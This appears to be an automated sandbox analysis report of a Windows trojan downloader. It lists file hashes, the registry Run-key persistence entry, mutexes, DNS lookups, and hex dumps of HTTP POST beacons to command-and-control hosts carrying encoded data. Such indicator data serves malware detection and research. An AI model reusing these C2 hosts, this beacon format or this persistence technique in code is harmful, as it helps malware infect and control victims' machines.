Analysis Date2013-09-09 22:45:56
MD56c67e50d0142b5467339de0175d5a5e2
SHA10ee2d963731868cc208f8234604c425291454207

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: 143887b24a675bf9b5696cdbda4cfabf sha1: 45ca5ae90440cf50b239cc08dfa8650d94058061 size: 14336
SectionDATA md5: c194a432e835a6044bd8f64195dedd80 sha1: 96441945508c20ce5af5bec83f536b2f376e45b5 size: 153600
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 5d6125c1942fedc08b05fad3b72a40f4 sha1: 56b6616a286173925760528c17d6aadb76d223e7 size: 1536
Section.reloc md5: 8d930bd04fb1cd7050d5d879b6c894c7 sha1: c8032b3935673c32658e750d0da281d3bbda56aa size: 512
Section.rsrc md5: 30cc794bf22a6385cd1260b4065f240b sha1: c74a7f6734d811236667e3050fe97749bc340ea2 size: 1024
Timestamp1992-06-19 22:22:17
PEhashe20bd436c3f610692adcc14c14519f40526e78ba
AVclamavWin.Trojan.Downloader-1280
AVavgDownloader.Zlob
AVaviraTR/Crypt.XPACK.Gen2

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\CY08W456F0\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CY08W456F0 ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS119.17.203.37
Winsock DNSlacvictoria.com
Winsock DNSqqplot.com

Network Details:

DNSwsj.com
Type: A
205.203.132.1
DNSwsj.com
Type: A
205.203.132.65
DNSwsj.com
Type: A
205.203.140.1
DNSwsj.com
Type: A
205.203.140.65
DNSfastclick.com
Type: A
64.156.167.84
DNSnifty.com
Type: A
210.131.4.217
DNSqqplot.com
Type: A
109.74.195.149
DNSbonreligion.com
Type: A
107.20.206.69
DNSlacvictoria.com
Type: A
DNSpaulo-fg.com
Type: A
HTTP POSThttp://qqplot.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POSThttp://119.17.203.37/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 109.74.195.149:80
Flows TCP192.168.1.1:1032 ➝ 119.17.203.37:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   7171706c 6f742e63 6f6d0d0a 436f6e74   qqplot.com..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3334310d   ent-Length: 341.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000e0 (00224)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000f0 (00240)   0d0a0d0a 64617461 3d2f436a 45665a44   ....data=/CjEfZD
0x00000100 (00256)   53767871 43694b30 6c34304d 79375376   SvxqCiK0l40My7Sv
0x00000110 (00272)   6a7a2b45 6436746b 5a6d417a 39713254   jz+Ed6tkZmAz9q2T
0x00000120 (00288)   6e675151 2f6e5a6c 702f7042 73765a43   ngQQ/nZlp/pBsvZC
0x00000130 (00304)   66463772 69426b47 2f672b37 5643432f   fF7riBkG/g+7VCC/
0x00000140 (00320)   30704562 754f4870 37655263 48506959   0pEbuOHp7eRcHPiY
0x00000150 (00336)   6f393949 4d55756a 67555734 62765449   o99IMUujgUW4bvTI
0x00000160 (00352)   644e2f6a 50587547 506a6142 7a786c63   dN/jPXuGPjaBzxlc
0x00000170 (00368)   63356d70 4e303161 36742f51 69535858   c5mpN01a6t/QiSXX
0x00000180 (00384)   77707a39 486d306b 7a396642 6661556e   wpz9Hm0kz9fBfaUn
0x00000190 (00400)   3130782f 474c636f 66526948 344c7646   10x/GLcofRiH4LvF
0x000001a0 (00416)   73416947 59467361 696f4d57 30374b30   sAiGYFsaioMW07K0
0x000001b0 (00432)   4533726b 6b334d65 5a557967 44654c47   E3rkk3MeZUygDeLG
0x000001c0 (00448)   77327331 322b6f50 4d4e726e 4a5a637a   w2s12+oPMNrnJZcz
0x000001d0 (00464)   687a5a38 78694e57 75355467 4f687134   hzZ8xiNWu5TgOhq4
0x000001e0 (00480)   4f715553 30424d54 644b3262 5a792f68   OqUS0BMTdK2bZy/h
0x000001f0 (00496)   7833546e 6d477954 464c4868 4c635266   x3TnmGyTFLHhLcRf
0x00000200 (00512)   2b76417a 494f424e 6d763433 43444b32   +vAzIOBNmv43CDK2
0x00000210 (00528)   51303541 56636d41 38324b68 54665573   Q05AVcmA82KhTfUs
0x00000220 (00544)   732f476f 6c77786c 6d396b4c 6e726e6c   s/Golwxlm9kLnrnl
0x00000230 (00560)   492b3555 366e3336 642f3334 6b6f6c56   I+5U6n36d/34kolV
0x00000240 (00576)   31614b51 6e2b513d 3d                  1aKQn+Q==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   3131392e 31372e32 30332e33 370d0a43   119.17.203.37..C
0x000000b0 (00176)   6f6e7465 6e742d4c 656e6774 683a2033   ontent-Length: 3
0x000000c0 (00192)   34310d0a 436f6e6e 65637469 6f6e3a20   41..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 43616368   Keep-Alive..Cach
0x000000e0 (00224)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000f0 (00240)   6368650d 0a0d0a64 6174613d 2f436a45   che....data=/CjE
0x00000100 (00256)   665a4453 76787143 694b306c 34304d79   fZDSvxqCiK0l40My
0x00000110 (00272)   3753766a 7a2b4564 36746b5a 6d417a39   7Svjz+Ed6tkZmAz9
0x00000120 (00288)   7132546e 6751512f 6e5a6c70 2f704273   q2TngQQ/nZlp/pBs
0x00000130 (00304)   765a4366 46377269 426b472f 672b3756   vZCfF7riBkG/g+7V
0x00000140 (00320)   43432f30 70456275 4f487037 65526348   CC/0pEbuOHp7eRcH
0x00000150 (00336)   5069596f 3939494d 55756a67 55573462   PiYo99IMUujgUW4b
0x00000160 (00352)   76544964 4e2f6a50 58754750 6a61427a   vTIdN/jPXuGPjaBz
0x00000170 (00368)   786c6363 356d704e 30316136 742f5169   xlcc5mpN01a6t/Qi
0x00000180 (00384)   53585877 707a3948 6d306b7a 39664266   SXXwpz9Hm0kz9fBf
0x00000190 (00400)   61556e31 30782f47 4c636f66 52694834   aUn10x/GLcofRiH4
0x000001a0 (00416)   4c764673 41694759 46736169 6f4d5730   LvFsAiGYFsaioMW0
0x000001b0 (00432)   374b3045 33726b6b 334d655a 55796744   7K0E3rkk3MeZUygD
0x000001c0 (00448)   654c4777 32733132 2b6f504d 4e726e4a   eLGw2s12+oPMNrnJ
0x000001d0 (00464)   5a637a68 7a5a3878 694e5775 3554674f   ZczhzZ8xiNWu5TgO
0x000001e0 (00480)   6871344f 71555330 424d5464 4b32625a   hq4OqUS0BMTdK2bZ
0x000001f0 (00496)   792f6878 33546e6d 47795446 4c48684c   y/hx3TnmGyTFLHhL
0x00000200 (00512)   6352662b 76417a49 4f424e6d 76343343   cRf+vAzIOBNmv43C
0x00000210 (00528)   444b3251 30354156 636d4138 324b6854   DK2Q05AVcmA82KhT
0x00000220 (00544)   66557373 2f476f6c 77786c6d 396b4c6e   fUss/Golwxlm9kLn
0x00000230 (00560)   726e6c49 2b355536 6e333664 2f33346b   rnlI+5U6n36d/34k
0x00000240 (00576)   6f6c5631 614b516e 2b513d3d            olV1aKQn+Q==


Strings